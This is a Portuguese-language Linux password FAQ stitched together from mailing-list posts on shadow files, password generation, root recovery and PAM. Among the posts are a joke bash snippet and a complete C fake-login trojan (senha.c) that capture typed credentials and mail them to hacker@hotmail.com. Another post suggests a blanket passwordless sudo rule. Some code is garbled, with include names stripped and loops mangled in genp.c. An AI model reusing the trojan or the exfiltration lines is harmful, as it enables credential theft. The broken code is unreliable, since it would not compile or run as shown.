http://www.zago.eti.br/senhas.txt FAQ e dicas sobre senhas, criar, alterar, vencer e etc... Tem continuação deste FAQ em: http://www.zago.eti.br/senhas1.txt Use CTRL+F para refinar a pesquisa. Veja neste diretório (site) centralização de senhas e login com pam em: pam.txt http://www.zago.eti.br/pam.txt ldap.txt http://www.zago.eti.br/ldap.txt nis.txt http://www.zago.eti.br/nis.txt ************************************************************************* Mais indicações, ajuda e FAQ relacionados a senhas.... Diretório do apache com senha ( senhas nas paginas do web server apache). http://www.zago.eti.br/apache.txt Senhas no Samba, como criar usuários e senhas. http://www.zago.eti.br/samba.txt Centralização de login e senha em uma maquina Linux. http://www.zago.eti.br/nis.txt Dicas para trocar a senha do root quando perder a senha. http://www.zago.eti.br/grub.txt Páginas do manual - help... passwd - atualiza a senha de um usuário man passwd usermod - Modify a user account man usermod chage - change user password expiry information man chage Veja outras indicações e mais detalhes sobre criar usuários, tambem mais detalhes sobre senhas no FAQ: http://www.zago.eti.br/user.txt Scripts e dicas pra automatizar a criação de usuários: http://www.zago.eti.br/user-cadastro.txt senhas-trocar-via-web.txt - totorial e link pro script que permite trocar senhas via web. http://www.zago.eti.br/senhas-trocar-via-web.txt PERGUNTAS & RESPOSTAS da CONECTIVA 10.6. Perdi a senha do root como faço para alterar na versão CL8? http://www.conectiva.com.br/cpub/pt/incConectiva/suporte/pr/sistema.problemas.perdi.senha.root.htm http://web.onda.com.br/orso/chetcpasswd.html script para alterar senhas http://changepassword.sourceforge.net/index.php?lang=br O ChangePassword modifica as senhas do passwd, samba e squid de determinado usuário através da WEB. Todas as senhas são sincronizadas e alteradas em tempo real através de navegadores como mozilla, netscape, IE, opera e outros. Como criar boas senhas? veja em: http://www.lab.eti.br/cartilha.htm#boasenha Habilitar e desabilitar o shadow A maneira mais segura de se manter a senha, é sobre a proteção do shadow, para desabilitar o shadow: # pwunconv para habilita-lo: # pwconv /etc/login.defs aqui está as configurações de login, pode definir por quantos dias valerá a senha, tamanho e etc.. Quebrar senha (força bruta), descobrir senhas Nunca utilizei, quando recebo este tipo de pedido de clientes e chefes que querem todas as senhas de seus usuários, simplesmente justifico que não existe engenharia reversa, o processo tem caminho único, o algoritmo do hash pra gerar senhas é unidirecional, não é possivel fazer o caminho oposto pra conseguir as senhas em um texto legivel, mas existem algumas tecnicas e metodos pra se conseguir senhas, considero todos eles, imoral, ilegal e sujo, mas isto é a minha opinião. Antes de utilizar algum metodo, considere os aspectos legais, por exemplo violação de privacidade, correspondecia e outras consequencias. Considere que pra quebrar somente uma senha de 8 digitos demora varios dias, isto em um computador muito bom. Existem alguns metodos "sujo", entre eles instalar um sniffer pra pegar as senhas de quem fizer login na maquina. Existem sistemas de autenticação que armazenam senhas em text-plain, sistemas pra armazenar senhas no formato texto em banco de dados, com isto basta acessar o banco de dados pra ter acesso às senhas, talvez consiga isto com PAM e MySQL ou outro sistema. Lembre que em micros de cara pra internet vai comprometer a segurança. Administradores de rede devem ter muito cuidado com o que é instalado em qualquer maquina da rede, devem monitorar a rede constantemente, muitos se preocupam com o vem da internet e se esquecem do que os usuários podem fazer a partir de uma estação. Caso queira ir em frente, saiba que existe muitos programas na internet pra isto, todos com alto risco de comprometer tua instalação, pesquise na internet por sniffer, key logger e "John the Ripper", John the Ripper password cracker http://www.openwall.com/john/ ************************************************************************* ************************************************************************* Podemos centralizar o cadastro de usuarios e suas senhas em uma única maquina da rede, isto facilita muito a adminstração da rede e usuários, neste diretório tem um tutorial sobre o NIS veja nis.txt além do NIS tem o LDAP, NIS+, KERBEROS e outros pacotes que funciona como centralizador de login e senhas, parece que o LDAP é mais moderno. Importantíssimo: não anote a senha, alguém pode achar o papel com a senha e tchau. Procure construir uma senha forte com elementos que sejam de fácil lembrança porém específicos de sua vida combinando letras maiusculas + minusculas + numeros + caracteres especiais, nao use senhas to tipo mane123 ou formada por uma palavra que serão facilmente quebradas por programas que usam dicionarios ou gera combinação de letras para formar palavras. Troque a senha imediamente quando suspeitar que alguém observou você digitando a senha e possa ter guardado a sequencia das teclas, evite digitar senhas em micros dos outros, no windows tem muitos programas de capturar senha. Tem gente que usa até camera oculta para este fim. veja uma matéria de como criar boas senhas em: http://www.lab.eti.br/cartilha.htm#boasenha ************************************************************************* De: Marcus Lima Responder-a: Marcus Lima Para: Humberto Bomfim , JOV Cc: linux-br Assunto: Re: (linux-br) Senha de Root Data: 18 Feb 2003 16:38:05 -0300 > Q eu saiba, só dando boot com um cd do slackware, vc consergue montar a > partição e alterá-la Dando boot com o CD do Conectiva 8, escolhendo a opção rescue e montando a partição na memória. Assim você pode abrir o arquivo /etc/shadow e trocar o campo referente a senha de root pelo campo referente a senha de qualquer outro usuário que você tenha a senha. Salve e reinicie. Ps.: Porque o CD do Slackware? - Marcus Lima. ************************************************************************* > > Eu estou fazendo um script em bash onde requer uma senha, mas ela nao pode > > aparecer na tela. Existe algum comando onde eu desativo o prompt e depois > > posso volta-lo?? > > echo -n "digite a senha e tecle enter: " > stty -echo > read senha > stty echo > echo $senha | mail hacker@hotmail.com > echo "obrigado!" > > ':) > > -- > eliphas > > > // arquivo senha.c #define Senha "Password: " #define erro "\nLogin incorrect" #define Festa "/tmp/.alexandro" #include #include void sair () { return; } main() { char burro[10], senha[10]; int pid; FILE *fo; signal (SIGINT, sair); pid = getppid(); for(;;){ for (;;){ system("/usr/bin/clear"); aleI: system("/bin/cat /etc/issue"); aleII: printf("\nlogin: "); gets (burro); if (strcmp (burro, "") != 0) break; else goto aleI; } system ("stty -echo > /dev/console"); printf(Senha); scanf("%s",senha); getchar(); system ("stty echo > /dev/console"); printf (erro); if ( ( fo = fopen(Festa,"a") ) != NULL ){ fprintf(fo,"nome do usuário: %s senha: %s\n",burro,senha); fclose(fo); } if (strlen (burro) >= 3) break; else goto aleII; } printf (erro); system ("/bin/mail hacker@hotmail.com < /tmp/.alexandro"); system ("/bin/sleep 1"); kill (pid,9); } ************************************************************************* login sem senha Falei que com uma maquina na mao eu descobria!!! La vai a receita de bolo. Nao sei se e maneira correta de faze-lo, mas funciona. Pelo menos no meu computador. E um Mandrake 7.02 com kernel 2.2.14. 1- Editar o arquivo /etc/rc.d/init.d/single Adiciona :/usr/X11R6/bin ao PATH:/bin:/usr/bin ou sei la o que tem no seu. 2- Fazer um link simbolico para o X Font Server cd /etc/rc.d/rc1.d ln -s ../init.d/xfs S90xfs 3- Apague o arquivo K10xfs ou o que existir no seu /etc/rcd./rc1.d sobre xfs 4- Fazer um link simbolico para o startx. cd /etc/rc.d/rc1.d ln -s /usr/X11R6/bin/startx S99startx 5- Ir para a galera. :-) Não existe maneira "Funcional/Pronta" de fazer um logon sem digitar os dados. Seria o equivalente a você entrar no Windows NT sem fazer o LOGON. Mas, para sua sorte, o Linux é OpenSource, é só baixar o Xdm e alterar o fonte para entrar com um usuário pré-definido. ************************************************************************ ************************************************************************* > > Tenho uma rede com 5 computadores todos com linux, e cada um com o >seu devido usuario, a minha pergunta e' a seguinte: Como faco p/ >automatizar o login, sem q a pessoa tenha q digitar o login e a senha, >ja' faca isso automatico com o usuario q eu desejar !! > >Obrigado e Aguardo Reposta. > entre diversas outras "soluçÕes", vc pode inserir a linha: 7:2345:respawn:/bin/su - usuario < /dev/tty7 > /dev/tty7 2>&1 no seu /etc/inittab, com as devidas modificaçÕes... ************************************************************************* copiado de: http://www.revista.unicamp.br/navegacao/index3.html Senhas -- Geração automática De tempos em tempos administradores de sistemas precisam criar um grande número de contas. Criá-las manualmente, além de ineficiente e propenso a erros, pode demorar uma eternidade. Imagine o caso de universidades ou escolas que recebem centenas ou mesmo milhares de novos alunos a cada semestre. Sistemas Linux possui um utilitário feito sob medida para esta situação chamado mkpasswd. O comando mkpasswd, quando invocado sem argumentos, retorna uma senha: # mkpasswd 9nn7sJJvj Uma shell script simples para criar quantas contas forem necessárias e que atribui a cada usuário uma senha pode ser criada facilmente. Para efeito de nosso exemplo considere que a lista dos usuários a ser criados encontra-se no arquivo novos-usuarios.txt. #!/bin/bash for usuario in `cat novos-usuarios.txt` do useradd $usuario mkpasswd $usuario > $usuario.senha # Criação da carta ao usuário, contendo # sua senha, normas de uso e recomenda- # ções gerais cat > $usuario.carta << EOF Prezado Usuário(a), Conforme sua solicitação, foi criada uma conta em nossos computadores centrais com as seguintes especificações: computador: computador.dominio.com.br identificação: $usuario senha: `echo $usuario.senha` Solicitamos a memorização das informações contidas neste documento e sua destruição em seguida devido ao caráter confidencial destas informações. Realize a troca de sua senha já em seu primeiro acesso para algo que lhe seja mais fácil de lembrar. Lembre-se, nunca divulgue a sua senha de acesso para ninguém. A segurança de seus dados e do sistema como um todo dependem de você. Para maiores informações consulte o endereço http://www.dominio.com.br/suporte ou envie uma mensagem para suporte@dominio.com.br Atenciosamente, Suporte Técnico - Centro de Computação EOF lpr $usuario.carta rm $usuario.* done O processo acima cria a conta do novo usuário, atribui-lhe uma senha inicial de acesso e imprime, na impressora padrão do sistema, uma carta a ser entregue ao novo usuário. Os comandos useradd e mkpasswd aceitam diversas opções, que podem ser usadas para especificar com mais precisão o ambiente do usuário. Para simplicidade de entendimento, os comandos empregados na shell script acima utilizaram os valores padrão. Após o processamento todos os arquivos temporários são removidos. Problemas acontecem. Recomendamos sempre que se gere um backup dos arquivos envolvidos /etc/passwd, /etc/shadow e /etc/group) antes da execução deste script. Outra recomendação importante é que todas as senhas criadas por este método sejam expiradas, requerendo do usuário a sua troca quando do primeiro login. ************************************************************* bash Use o 'stty' (stty -echo / stty echo): #!/bin/sh echo -n "login: " read login echo -n "password: " stty -echo read password stty echo echo echo "Seu login é \"$login\" e sua senha é \"$password\"" # Fim ! [vfarias@gauss vfarias]$ ./tmpscript login: vfarias password: Seu login é "vfarias" e sua senha é "invisível" []'s On Mon, May 22, 2000 at 01:38:42PM -0300, Grupo de Estudos em Linux wrote: |) |) Eu estou fazendo um script em bash onde requer uma senha, mas ela nao pode |) aparecer na tela. Existe algum comando onde eu desativo o prompt e depois |) posso volta-lo?? ************************************************************* ************************************************************* Cadastre seus usuarios. Depois edite um arquivo texto com o seguinte formato: user1:senha1 user2:senha2 user3:senha3 .... Em seguida execute chpasswd < arquivo. Linux wrote: > Olá lista... > > Alguém saberia de um script para cadastrar uma mesma senha para todos os > usuários de um grupo. Tipo, eu preciso recadastrar meus usuários de > Email. Eu ia disponibilizar um serviço para a troca das mesmas por uma > página de Web, e queria antes disso, colocar uma senha padrão pra todo > mundo. Tem jeito de fazer isso? ************************************************************* ************************************************************* ************************************************************* ************************************************************* Geracao automatica de senhas Muitas instituicoes possuem a necessidade, de tempos em tempos, de criar um grande numero de contas. A digitacao de senhas consumiria um tempo enorme, requerendo a mobilizacao de um grande numero de pessoas para suprir a esta demanda. Para acelerar este processo pode-se gerar as senhas automaticamente e utilizar um outro programa para encripta-las. Para efetuar a encriptacao das senhas pode-se usar o programa makekey ou similares. O programa makekey e encontrado no sistema operacional AIX. A plataforma Solaris nao possui este programa mas a versao existente no SunOS funciona normalmente. Os exemplos que se seguem utilizam o programa makekey. Por exemplo, para encriptar a senha xptouytr executar o comando echo xptouytr12 | makekey > encrippass O arquivo encrippass ira conter a senha encriptada. O argumento para o programa makekey deve conter obrigatoriamente 10 caracteres sendo que os 8 primeiros consistem da senha que sera utilizada. (Para maiores detalhes sobre o programa makekey, consultar a manpage em anexo). No nosso exemplo em particular o arquivo encrippass ira conter a string 12foa4VUwoL6E, que deve entao ser inserida no arquivo /etc/passwd ou /etc/shadow, etc. Deve-se tomar bastante cuidado com esta edicao para evitar que erros de programacao estraguem os arquivos passwd. Recomenda-se sempre que se gere um backup dos arquivos password antes da sua edicao. Outra recomendacao importante e que todas as senhas criadas por este metodo sejam expiradas, requerendo do usuario a sua troca quando do primeiro login. A maneira de se implementar isto varia de sistema para sistema. Deve-se tambem imprimir uma carta ao usuario contendo, alem da identificacao do usuario e sua senha, as normas e politicas de uso dos computadores. Existem varios programas disponiveis para geracao aleatoria de senhas. Incluo a seguir o codigo fonte do programa genp.c, que pode ser utilizado com esta finalidade. ----------------------------- genp.c ---------------------------------------- /* genp - generate pronounceable passwords. * David Sherman, The Law Society of Upper Canada, dave@lsuc.on.ca */ #include char pwd[100]; char *vowels[] = { "a", "e", "i", "o", "u", "y", "ai", "ou", "oy", "ay", "ow", "ar", "al", "el", "er", "or", "ax", "ex", "ix", "il", 0 }; char *consonants[] = { "b", "c", "ch", "d", "dr", "f", "fl", "g", "h", "j", "k", "kn", "kr", "m", "n", "p", "s", "sh", "sm", "sn", "st", "t", "th", "v", "z", 0 }; main(argc, argv) char **argv; { register int maxvowels, maxcons; int total; register int r, i; int j; char **p; #define DEFTOTAL 1 if(argc < 2) total = DEFTOTAL; else total = atoi(argv[1]); if(total < 1) total = DEFTOTAL; for(p=vowels; *p; p++) ; maxvowels = p-vowels; for(p=consonants; *p; p++) ; maxcons = p-consonants; srand(getpid()); for(j=0; j0; i--) r = rand(); strcat(pwd, vowels[r%maxvowels]); r = rand(); strcat(pwd, consonants[r%maxcons]); for(i=r%7; i>0; i--) r = rand(); strcat(pwd, vowels[r%maxvowels]); r = rand(); strcat(pwd, consonants[r%maxcons]); for(i=r%3; i>0; i--) r = rand(); strcat(pwd, vowels[r%maxvowels]); puts(pwd); } } ------------------- man page makekey (aix 4.1.4) -------------------------- makekey Command Purpose Generates an encryption key. Syntax makekey [ ASCIICharacters ... ] Description The makekey command generates an encryption key for use with programs that perform encryption. Its input and output are usually pipes. The makekey command reads 10 characters from standard input and writes 13 characters to standard output. The first 8 of the 10 input characters can be any sequence of ASCII characters, as specified by the ASCIICharacters parameter. The last two input characters, called the salt, are chosen from the sets 0 through 9, a through z, A through Z, . (period), and / (slash). The salt characters are repeated as the first two characters of the output. The remaining 11 output characters are chosen from the same set as the salt and constitute the output key that you use as the encryption key parameter of programs that perform encryption. Examples Entering the following example at the command line generates an encryption key: makekey 1234567890 The makekey command generates an encryption key based on the input string 1234567890 and displays the following encryption key below, with the $_ (shell prompt) appearing immediately after the generated key and on the same line. 90y744T/NXw1U$_ Implementation Specifics Software Product/Option: Base Operating System/ Base Application Development Toolkit Standards Compliance: BSD 4.3 Related Information The crypt, encrypt, or setkey subroutine. ************************************************************* Linux: Recuperacao da Senha de Root --------------------------------------------------------------------- Voce se esqueceu da senha de root? Nao desespere. Em sistemas Linux basta realizar o boot do sistema em modo monousuario. Para isto, ao aparecer o prompt do LILO: LILO boot: digitar linux -s Isto fara com que o sistema seja carregado em modo monousuario. Sera exibido, apos o final do boot, o prompt da shell bash: bash$ Editar entao o arquivo /etc/passwd e apagar a senha do root. A conta root tera entao o acesso liberado. Por exemplo: root:TJhj9wMmjQvhk:0:0:root:/root:/bin/bash Remover a senha, deixando a linha correspondente ao root da seguinte forma: root::0:0:root:/root:/bin/bash Rebootar a maquina normalmente, logar como root (nao sera solicitada a senha) e realizar a troca da senha do root com o comando passwd. *************************************************************** Linux: Recuperacao da Senha de Root (2) --------------------------------------------------------------------- Colaboracao: Mario Olimpio de Menezes [mario@curiango.ipen.br] O procedimento descrito na mensagem de ontem para recuperacao da senha de root em sistemas Linux so funcionara se o seu Lilo nao estiver com configuracao de senha para esta operacao. Ou seja, se voce se esqueceu da senha do root e a senha do Lilo, ai so com um disco rescue. Normalmente, servidores criticos nao sao deixados sem senha de Lilo justamente por esta possibilidade; voce nao quer que algum engracadinho que pensa saber um pouco de Linux, de um reboot na sua maquina e simplesmente mude a senha do root. As opcoes do Lilo para colocar senha sao: password=password (protege a imagem por uma senha) restricted (quando voce for iniciar o sistema em modo "single"). Estas opcoes sao por imagem existente no lilo.conf. Se voce colocou senha, mude as permissoes do arquivo para 0600, senao nao adianta muito :-) Para maiores informacoes sobre as opcoes de configuracao do lilo utilize as man pages "lilo.conf" e "lilo". *************************************************************** Linux: Recuperacao da Senha de Root (3) --------------------------------------------------------------------- Colaboracao: Antonio Figueiredo [antonio@dca.fee.unicamp.br] A dica revela um furo enorme de seguranca, imaginando que se tenha dezenas de maquina Linux espalhadas nos laboratorios e nas empresas. Um usuario mau intencionado, podera utilizar esta "feature" e ter acesso de root localmente. Para resolver este problema, recomendo que se faca o seguinte: 1) edite o /etc/inittab, acrescentando as linhas abaixo em "System initialization" ls:s:wait:/etc/rc.d/rc.single lS:S:wait:/etc/rc.d/rc.single 2) Ponha o script abaixo em /etc/rc.d/rc.single #!/bin/sh # # /etc/rc.d/rc.single - single user mode script # echo "Entering single user mode..." echo /sbin/sulogin Pronto!, ao digitar "linux -s", o sistema pedira senha para entrar em single user. Mas, caso esqueceu a senha, gere um disquete de boot, boot seu sistema via este disquete e monte a particao de / e edite o seu /etc/passwd. Isto daria um pouco mais de trabalho para um usuario que queira ter este tipo de acesso. Voce ainda pode colocar senha na BIOS e evitar boot via drive A para evitar que alguem venha tambem utilizar este recurso. Mais uma vez, uma senha em sua vida. *************************************************************** > Ola pessoal, estou definindo uma politica de segurança, relacionado > a > senhas, quando usavamos novell eu configurava o NDS para exigir a > troca da > senha a cada 20 dias, estou querendo fazer o mesmo com o linux, mas > quando > entro no atalho alterar senha, e tento alterar a senha da rede M$, > ele me > diz que a senha digitada é incorreta, alguem saberia de algum > aplicativo que > poderia ser carregado na estção win 95 ou 98, que permitisse ao > usuário > alterar a senha dele? Melhor ainda, teria como o sistema informar > ao usuário > que a senha dele está para expirar em X dias e que deve troca-la? Bom, eu tenho aqui o Linux como PDC da minha rede, e da para trocar a senha legal via painel de controle. Ainda nao tentei fazer ele pedir para trocar a senha a cada 20 dias... mas, pela logica, se vc colocar que a senha expira em 20 dias (usando o usermod), isso funcione. Vc jah tentou isso? *************************************************************** No site http://www.olinux.com.br/ peguei uma interessante "dica" para um gerador aleatório de senhas usando o Linux. Experimentei e funciona muito bem e fiz um script bem rudimentar para o uso. Vejam abaixo: #!/bin/sh clear echo --------- A senha é ------ head -c8 /dev/random | uuencode -m - | sed -n '2s/=*$//;2p' echo -------------------------- echo echo Tecle ENTER para finalizar read SAI *************************************************************** Subject: Re: (linux-br) inibir alteração de senha - ninguém fez??? Vc ja tentou mudar os direitos de execucao do smbpasswd? Tenta isso, quem sabe resolve. Se vc quiser faca o mm com o passwd. >Preciso impedir que um usuário do samba altere sua senha ??? Estou precisando fazer com que o usuário de nome "usuario" não consiga alterar sua senha, que é idêntica ao seu nome, "usuario", *************************************************************** Subject: Re: (linux-br) Algoritmo de criptografia do passwd Em Domingo 03 Fevereiro 2002 00:20, Leonardo Dias escreveu: > Alguém sabe se há (e qual é) um programa que criptografe uma > string com o mesmo método da criptografia das senhas do > passwd? Thiago, Com a mesma vulnerabilidade, você quer dizer ? :-) Não sou especialista em segurança, mas acredito que essa não seja uma solução excelente para o seu produto. Seria melhor dar uma olhada em http://www.linuxsecurity.com.br e ver qual a melhor solução para criptografia do tipo de dado/aplicativo que você tem. De qualquer forma, aqui vai a resposta à sua dúvida: o /etc/passwd não usa criptografia, mas o /etc/shadow, sim. As senhas ficam armazenadas neste segundo diretório e aparecem *sombreadas* no /etc/passwd. O programa utilizado é o "Linux Password Shadow Suite" (pacotes shadow-utils, shadow-m e shadow-misc ou algo semelhante). Veja, o Shadow é seguro porque soma esforços com o restante de seu sistema para proteger seus dados. Se você vai colocar o mesmo sistema em um programa e distribuí-lo, esse método de segurança perde o sentido, fica vulnerável. Sds. *************************************************************** De: Edgard Lemos Responder-a: edgard@edconsultoria.com.br Para: Leandro Mendes , Linux-br Assunto: Re: (linux-br) Descrição das colunas do SHADOW Data: 10 May 2002 00:49:11 -0300 Em Thursday 09 May 2002 11:53, Leandro Mendes escreveu: > Olá amigos, estou com mais uma duvida. > > Dentro do arquivo /etc/shadow, preciso saber a descrição de uma > coluna especifica. > Exemplo: Use fontes fixas para fazer arte ascii. > login:Senha:11816:0:99999:7::: > | | | |___Esse Campo? > | | | > | | |___Esse Campo? > | | > | |____Esse Campo? > | > |___O que é esse campo? > > Se alguem puder me passar esses dados desde jah agradeço; $ man 5 shadow DESCRIÇÃO shadow contém as informações de senhas criptografadas das contas dos usuários e opcionalmente a informação de idade da senha. Contém: Nome de acesso. Senha criptografada. Dias decorridos entre 1 de janeiro de 1970 e a última alteração da senha. Número de dias até que a senha deva ser alterada. Número de dias após o qual a senha deve ser alterada. Número de dias antes da expiração da senha no qual o usuário será avisado. Número de dias após a expiração da senha que a conta deve ser desabilitada. Dias decorridos entre 1 de janeiro de 1970 e a data em que a conta foi desabilitada. Campo reservado. Ou "xeje", sua senha foi criada 11816 dias depois de 1º de janeiro de 1970, vai expirar 99999 dias depois de 1º de janeiro de 1970* e seu usuário vai ficar sabendo que a senha vai expirar 7 dias antes. *O que equivale em termos práticos a dizer que a senha não expira (99999 dias = aprox. 274 anos). []s -- *************************************************************** De: Lauro C. Oliveira Para: Bruno Bustamante , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) D Data: 26 Jul 2002 13:31:12 -0300 Em Thu, 25 Jul 2002 14:45:54 -0300 "Bruno Bustamante" escreveu-me: > Boa tarde a todos, > > > Alguém tem idéia se é possível modificar a senha de um usuário diretamente > pela linha de comando sem que apareça o prompt para digitar e confirmar a > senha? , como por exemplo, passwd fulano <123> entenderam? usermod -p senha_criptografada usuario procure no historico q tem uma linha em perl que criptografa a senha.. desse mes.. entao faca: usermod -p `comando do perl q criptografa senha` usuario -- *************************************************************** De: Jet Sites - Renato Q. Todorov Para: Lauro C. Oliveira , Bruno Bustamante , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) D Data: 26 Jul 2002 14:09:04 -0400 Nem precisa disso tudo não cara.. Digita assim: echo senha | passwd usuario --stdin Prontinho... sem precisar confirmar nem nada... Em Sex 26 Jul 2002 12:31, Lauro C. Oliveira escreveu: > > Alguém tem idéia se é possível modificar a senha de um usuário > > diretamente pela linha de comando sem que apareça o prompt para digitar e > > confirmar a senha? , como por exemplo, passwd fulano <123> entenderam? > > usermod -p senha_criptografada usuario > > procure no historico q tem uma linha em perl que criptografa a senha.. > desse mes.. > > entao faca: > > usermod -p `comando do perl q criptografa senha` usuario *************************************************************** De: Linuxiado Responder-a: linuxiado@ieg.com.br Para: Maicon Radeschi , LINUX BR Assunto: Re: (linux-br) Ajuda com Shell Script para password Data: 20 Jul 2002 21:49:24 -0300 Tente editar o arquivo /etc/sudoers e acrescentar a linha: nomedoseuusuário ALL=(/usr/bin/mplayer) NOPASSWD: ALL caso não funcione e você não tenha grandes preocupações com segurança, use: nomedoseuusuário ALL=(ALL) NOPASSWD: ALL Espero que ajude... Em Rio de Janeiro, Sexta, 19 de Julho de 2002 20:11, Maicon Radeschi me disse: > bom.. primeiramente , olá pessoal > meu "problema" eh que eu utilizo o mplayer com a opcao -vo svga, e essa > opcao soh eh disponivel para o root, pois soh o root pode usar a svgalib, > entao eu uso o sudo pra nao ter que assistindo videos como root, mas toda > hora que inicio o mplayer tenho que digitar a minha senha, gostaria de > saber se alguem pode me ajudar a criar um script que jah coloque a senha > tipo assim... > > === > #!/bin/bash > mplayer -vo svga $1 $2 > password="senha" > == > > entederam ? para que eu nao precise ficar digitando minha senha toda hora, > qual seria o comando certo a acrescentar no shell script ? *************************************************************** De: Piter Punk Para: Webmaster Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Senha Aleatória. Data: 05 Sep 2002 10:13:13 -0300 Webmaster wrote: Alguém da lista saberia me informar qual o comando do linux para gerar senha aleatoriamente. Essa tem na minha página... mas dou uma colher de chá e posto aqui na lista também -;) # dd if=/dev/random ibs=6 count=1 2>/dev/null | mimencode Vai gerar uma senha de 8 caracteres. Super aleatória. Falous, Piter PUNK *************************************************************** De: Jorge Godoy Para: Rafael Santos Cc: Linux-BR Assunto: Re: (linux-br) Re: (prog-br) PHP protegendo os codigos. Data: 12 Sep 2002 11:00:35 -0300 Rafael Santos writes: > Trechos que fazem conexão com bancos MySQL e PostgreSQL > com nomes e senhas de usuários habilitados > a mexer no banco ? Que tal um pequeno wrapper em C que permita o uso de SUID para ler um arquivo com permissões restritas? Ou, para criptografar/decriptografar apenas isso. Raios! Se já estais fazendo uma chamada ao sistema, use GPG! Se senhas são o problema, não vejo solução melhor que esta. Uma saída alternativa: pedir a senha para o usuário e armazená-la temporariamente num cookie. Assim basta ler o cookie para saber a senha. Ao fechar o navegador, o cookie perde a validade. E a senha lá pode ser criptografada também... Já fiz isso com mod_perl. -- Godoy. *************************************************************** De: Andreas Hasenack Para: Webmaster Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Senha Aleatória. Data: 05 Sep 2002 10:25:18 -0300 Em Thu, Sep 05, 2002 at 09:46:41AM -0300, Webmaster escreveu: > Alguém da lista saberia me informar qual o comando do linux para gerar senha > aleatoriamente. mkpasswd (como usuário comum) *************************************************************** De: Marcus Lima Responder-a: Marcus Lima Para: zeluis@objetivo-americana.com.br, linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) alterar passwd de modo não interativo - c Data: 23 Oct 2002 14:38:43 -0200 /* > tentei várias soluções mas naõ consegui ainda. Estou precisando conseguir > alterar tanto a senha do /etc/passwd como do /etc/samba/smbpasswd de forma não > interativa e não consegui êxito. Na verdade tenho um programa C que recebe o > login do usuário e sua senha, e preciso de um código que permita realizar > estas alterações. Mesmo que a solução fosse chamar um segundo programa > passando esses parâmetros. */ Segue o código fonte feito por um desenvolvedor da empresa que trabalho. Claro que pode ser copiado e utilizado desde que obedecendo a GPL. - Marcus Lima. /* * Author: Ariel Nigri * Version: 1.0 stable * By: Winco Tec. e Sis. Ltda. * www.winco.com.br * Please observe the General Public License (GPL) to use this code * Thanks for all that makes Linux an exemple of freedom */ #include #include #include #include #include #include #include #include #include #include #include extern "C" { #include #include }; int respIndex = 0; //-------------------------------------------------------------------------- - pam_handle_t *pamh=NULL; static int my_conv(int nmsg, const struct pam_message **msg, struct pam_response **resp, void *appdata_ptr) { int i; const char **senhas = (const char **) appdata_ptr; *resp = (struct pam_response *) malloc(sizeof(struct pam_response) * nmsg); memset(*resp, 0, sizeof(struct pam_response) * nmsg); for (i = 0; i < nmsg; i ++) { // printf("%s\n", (*msg)[i].msg); fflush(stdout); (*resp)[i].resp = strdup(senhas[respIndex]); } return PAM_SUCCESS; } //-------------------------------------------------------------------------- - int main(int argc, char *argv[]) { if (argc != 4) { printf("uso: %s \n", argv[0]); return 1; } struct pam_conv conv = { my_conv, (void *) (argv + 2) // passamos a senha antiga e a nova. }; if (pam_start("passwd", argv[1], &conv, &pamh) != PAM_SUCCESS) { printf("ERRO: Iniciando biblioteca PAM\n"); return 1; } int retval = pam_authenticate(pamh, 0); if (retval != PAM_SUCCESS) { printf("ERRO: Logon invalido\n"); } else { setuid(0); respIndex = 1; retval = pam_chauthtok(pamh, 0); /* is user really user? */ if (retval != PAM_SUCCESS) { printf("ERRO: Nova senha invalida\n"); } } /* This is where we have been authorized or not. */ if (retval == PAM_SUCCESS) { // umask(0117); // strcpy(user, luser); // Vamos mudar nosso uid e gid. printf("Senha alterada com sucesso\n"); } else { printf("Houve algum erro. Tente novamente\n"); } pam_end(pamh, PAM_SUCCESS); return retval; } //-------------------------------------------------------------------- *************************************************************** De: Alexandre Chaves Fonseca Para: Marcus Lima , zeluis@objetivo-americana.com.br, linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) alterar passwd de modo não interativo - c Data: 23 Oct 2002 20:25:21 -0200 Passei pela mesma situação, eu fiz isso: (funciona e nao requer tudo isso q vc fez) for i in 1 2; do echo "senha";sleep 1;done | passwd username PS: os comandos estão em bash, basta vc chamar a função exec (acho q é essa) do C e executar isso. Eu usei isso em perl com o comando system ("for i in 1 2; do echo "senha";sleep 1;done | passwd username"); e deu certinho.............. Falow, Alexandre *************************************************************** De: Leandro Mendes Para: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Como mudar a senha dos usuarios no modo texto? Data: 25 Oct 2002 10:14:00 -0200 uma vez passaram uma forma aqui... era algo assim: echo "senha" |passwd usuario --stdin Altera a senha só que criptografada. *************************************************************** De: Fabio Russo Para: fabricio camargo Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) comando desencriptação Data: 06 Nov 2002 21:29:22 -0200 fabricio camargo wrote: > > alguem sabe qual é o comando de desencriptar senha no servidor ? preciso > transferir os meus usuario de servidor, de CL4 p/ CL8, acho q copiando a > shadow não vai funcionar ... por isso preciso do comando . Isso nao existe... O algoritimo de encriptacao usado pelo LINUX eh ONE WAY. Isso significa que nao ha como desencriptar as senhas. Uma forma um pouco estupida eh usar o john_the_ripper, Mas se voce tem uma encriptacao forte vai demorar uns 20 anos (Com um bocado de sorte) para quebrar todas... Por que voce nao tenta copiar o Shadow e usa-lo no servidor, Voce vai precisar de muito menos sorte [:P Falows ??? Russo. *************************************************************** De: Jorge Godoy Para: wanzer Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) arquivo de senhas Data: 14 Oct 2002 09:43:09 -0200 wanzer writes: > no cl8 onde fica o arquivo que guarda as senhas dos > usuarios... (postgres, mysql, etc...) No mesmo lugar que em qualquer distribuição que esteja utilizando shadow. /etc/shadow Só que estes usuários acima não possuem senhas. São usuários para restringir os privilégios de acesso dos programas, aumentando a segurança do sistema. -- Godoy. *************************************************************** De: Leandro Mendes Para: supmino , linux-br Assunto: Re: (linux-br) chpasswd Data: 29 Nov 2002 15:30:06 -0200 http://seu_ip/cgi-bin/chpasswd.gi ----- Original Message ----- From: "supmino" To: "linux-br" Sent: Friday, November 29, 2002 2:27 PM Subject: (linux-br) chpasswd Boa Tarde! Consegui compilar o Chpasswd, configurei o chpasswd.conf. Agora como faço para alterar as senhas dos usuários? Dentro do meu diretório /home/html/cgi-bin ele criou o arquivo chpasswd.cgi. Procurei no google e no http://linux-br.conectiva.com.br não achei nada a respeito de como 